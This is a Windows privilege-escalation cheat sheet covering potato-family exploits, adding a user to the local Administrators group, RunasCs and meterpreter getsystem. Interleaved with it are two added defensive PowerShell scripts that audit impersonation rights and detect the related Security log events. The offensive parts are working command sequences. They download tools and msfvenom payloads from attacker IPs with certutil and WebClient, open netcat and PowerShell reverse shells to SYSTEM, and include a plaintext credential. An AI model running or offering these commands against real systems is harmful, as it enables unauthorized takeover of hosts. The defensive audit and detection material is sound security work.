Any user with impersonation privileges to NT AUTHORITY\SYSTEM
- User privileges and potato exploit
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer, RoguePotato, SharpEfsPotato and GodPotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. The PrintSpoofer blog post linked below goes in-depth on the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
CMD> whoami /priv
# Find SeImpersonatePrivilege

# Use SigmaPotato - Improved GodPotato
# https://github.com/tylerdotrar/SigmaPotato
# In-memory attack. Find other attacks at the GitHub site
Kali> rlwrap nc -nlvp 1236
CMD> powershell
PS> [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://10.10.14.16/privesc/SigmaPotato.exe"))
PS> [SigmaPotato]::Main(@("--revshell","10.10.14.16","1236"))

# Use GodPotato to rule them all as of 8/27/2023
# https://github.com/BeichenDream/GodPotato
CMD> certutil -urlcache -split -f http://10.10.14.16/nc.exe
Kali> rlwrap nc -nlvp 1235
CMD> GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.16 1235"

# PrintSpoofer
# https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
CMD> .\PrintSpoofer64.exe -i -c cmd

# Use LocalPotato to rule them all - LocalPotato or SweetPotato as of 12/22/2022
# If you do not want to use LocalPotato or SweetPotato:
# If the machine is >= Windows 10 1809 & Windows Server 2019 - Try RoguePotato
# If the machine is < Windows 10 1809 (or 1803) < Windows Server 2019 and/or only x86 - Try JuicyPotato
# https://github.com/ivanitlearning/Juicy-Potato-x86
Kali> msfvenom -p windows/shell_reverse_tcp lhost=192.168.45.183 lport=443 -f exe -o shell.exe
CMD> certutil -urlcache -split -f http://192.168.45.183/j.exe        # JuicyPotato
CMD> certutil -urlcache -split -f http://192.168.45.183/shell.exe    # reverse shell
Kali> rlwrap nc -nlvp 443
CMD> j.exe -l 443 -p C:\wamp\bin\apache\Apache2.2.21\shell.exe -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
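Every potato variant above depends on the same precondition: the process the attacker already controls holds SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege). The defender's check is therefore "which principals on this host hold those rights, and which services run as them". The following PowerShell audit script is an added example, not part of the original cheat sheet or of any of the potato projects; it assumes it is run from an elevated prompt (secedit needs admin rights to export the policy) and that the exported INF uses the standard "[Privilege Rights]" layout, where each right lists SIDs prefixed with "*" or plain account names.

```powershell
# Added audit example: list the principals that hold the impersonation-related user
# rights on this host, then cross-reference them against the accounts that services
# run as. Any such service is a candidate for the potato-style escalation path.
function Get-ImpersonationPrivilegeHolders {
    param(
        [string[]]$Privileges = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')
    )
    # secedit writes the local security policy to an INF file; the [Privilege Rights]
    # section holds one "RightName = *SID,*SID,Name" line per user right.
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    try {
        $null = & secedit.exe /export /cfg $cfg /quiet
        if (-not (Test-Path $cfg)) { throw 'secedit export failed; run from an elevated prompt.' }
        $lines = Get-Content -Path $cfg
        foreach ($priv in $Privileges) {
            $line = $lines | Where-Object { $_ -match ('^{0}\s*=' -f [regex]::Escape($priv)) } |
                Select-Object -First 1
            if (-not $line) { continue }   # right is held by nobody on this host
            $entries = ($line -split '=', 2)[1].Trim() -split ','
            foreach ($entry in $entries) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                $account = $entry
                if ($entry.StartsWith('*')) {
                    # "*S-1-5-20" style entries are SIDs; resolve them to names where possible.
                    $sid = $entry.Substring(1)
                    try {
                        $account = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                            Translate([System.Security.Principal.NTAccount]).Value
                    } catch { $account = $sid }
                }
                [pscustomobject]@{ Privilege = $priv; Holder = $account; Raw = $entry }
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

function Get-ServicesRunningAsHolders {
    param([Parameter(Mandatory)][object[]]$Holders)
    # Service StartName formatting varies ("NT AUTHORITY\NetworkService" vs
    # "NT AUTHORITY\NETWORK SERVICE"), so compare on the account part, case-insensitively,
    # with spaces removed. Services running as a holder are the ones worth hardening first.
    $names = $Holders | ForEach-Object { ($_.Holder -split '\\')[-1] -replace '\s', '' } | Sort-Object -Unique
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $_.StartName -and ($names -contains (($_.StartName -split '\\')[-1] -replace '\s', ''))
    } | Select-Object Name, StartName, State, PathName
}

$holders = Get-ImpersonationPrivilegeHolders
$holders | Format-Table -AutoSize
Get-ServicesRunningAsHolders -Holders $holders | Format-Table -AutoSize
```

On a default install the holders are SERVICE, LOCAL SERVICE, NETWORK SERVICE and Administrators; what matters is every extra entry (an IIS application pool identity, a custom service account, a backup account) and every service listed in the second table, because compromise of any one of those processes is the entry point the tools above need. Removing the right from accounts that do not require it, or running the service under a virtual or managed service account, closes the path; the check is cheap enough to run on a schedule and diff.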
Normal User to Local Administrator or More Privileges
- Add Ourselves to the group - Normal Users to Local Administrator
net localgroup Administrators [username] /add
- RunasCS - Local Administrator with having more privileges (as well as logon as a different user)
# Run if you see a user in the Local Administrators group
# https://github.com/antonioCoco/RunasCs/
# Try if you can add the BypassUac and LogonType options
Kali> rlwrap nc -nlvp 444
PS> IEX (new-Object Net.WebClient).DownloadString('http://10.10.14.35/privesc/Invoke-RunasCs.ps1'); Invoke-RunasCs -Username backup -Password 'hjqNspenHcyyAwNqxfJAmFcAtiKThvpotaZpglDs' -BypassUac -LogonType 8 -Command cmd.exe -Remote 10.10.14.35:4444
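Both steps in this section leave a clear trace in the Windows Security log: "net localgroup Administrators ... /add" produces event 4732 (a member was added to a security-enabled local group), and an Invoke-RunasCs call produces a 4624 logon whose LogonType field is whatever was passed with -LogonType (8 in the command above, which is rare on a workstation; 9, "new credentials", is the other one worth watching). The script below is an added detection example, not part of the original cheat sheet or of the RunasCs project; it assumes the Security log is readable (run elevated) and that "Security Group Management" and "Logon" auditing are enabled, which they are by default on servers. The group names and logon types to watch are parameters so the same function serves both passages.

```powershell
# Added detection example: summarise local-group additions (4732) and logons with an
# unusual logon type (4624) from the last N hours on this host.
function Get-LocalPrivEscIndicators {
    param(
        [int]$Hours = 24,
        [string[]]$WatchedGroups = @('Administrators', 'Remote Desktop Users'),
        [int[]]$SuspiciousLogonTypes = @(8, 9)
    )
    $filter = @{ LogName = 'Security'; Id = @(4732, 4624); StartTime = (Get-Date).AddHours(-$Hours) }
    # Get-WinEvent throws when nothing matches; treat that as "no findings".
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Flatten the <EventData><Data Name=...> list into a name -> value map.
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        if ($e.Id -eq 4732) {
            if ($WatchedGroups -notcontains $d['TargetUserName']) { continue }
            $member = $d['MemberName']
            if (-not $member -or $member -eq '-') {
                # Local adds usually record only the SID of the new member; resolve it if possible.
                try {
                    $member = (New-Object System.Security.Principal.SecurityIdentifier($d['MemberSid'])).
                        Translate([System.Security.Principal.NTAccount]).Value
                } catch { $member = $d['MemberSid'] }
            }
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Event   = 'LocalGroupMemberAdded'
                Group   = $d['TargetUserName']
                Account = $member
                Actor   = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                Detail  = ''
            }
        }
        elseif ($e.Id -eq 4624) {
            $type = [int]$d['LogonType']
            if ($SuspiciousLogonTypes -notcontains $type) { continue }
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Event   = "LogonType$type"
                Group   = ''
                Account = '{0}\{1}' -f $d['TargetDomainName'], $d['TargetUserName']
                # SubjectUserName is the caller that requested the logon, i.e. the account
                # that ran the tool; ProcessName is the image that called LogonUser.
                Actor   = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
                Detail  = 'process={0} ip={1}' -f $d['ProcessName'], $d['IpAddress']
            }
        }
    }
}

Get-LocalPrivEscIndicators -Hours 24 | Sort-Object Time | Format-Table -AutoSize
```

The useful signal is the combination: a 4624 with logon type 8 or 9 whose Actor is an ordinary interactive user rather than a service, followed within minutes by a 4732 on Administrators performed by the account that logon produced. On a fleet the same two event IDs are what a SIEM rule should key on; this script is the single-host version for triage.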
Local Administrator to System
If you have a Metasploit meterpreter session going, you can run getsystem.
# load the 'priv' extension
meterpreter> use priv
Loading extension priv...success.
meterpreter>
# getsystem
# local administrator to SYSTEM
meterpreter> getsystem
...got system (via technique 1).
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter>